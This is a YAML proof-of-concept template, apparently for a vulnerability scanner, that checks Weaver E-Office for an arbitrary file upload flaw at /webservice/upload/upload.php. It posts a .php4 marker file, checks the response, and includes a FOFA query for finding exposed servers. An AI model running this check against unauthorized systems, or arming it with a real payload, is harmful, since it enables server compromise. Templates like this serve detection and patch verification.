product: 泛微E-Office
vName: 泛微 E-Office webservice-file-upload文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 泛微/webservice/upload/upload.php接口存在任意文件上传漏洞，导致获取服务器权限。
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /webservice/upload/upload.php
      file:
        file:
          - 52e039302a62d077.php4
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - .php4
            logic: and
          header:
            value:
              - text/html
            logic: and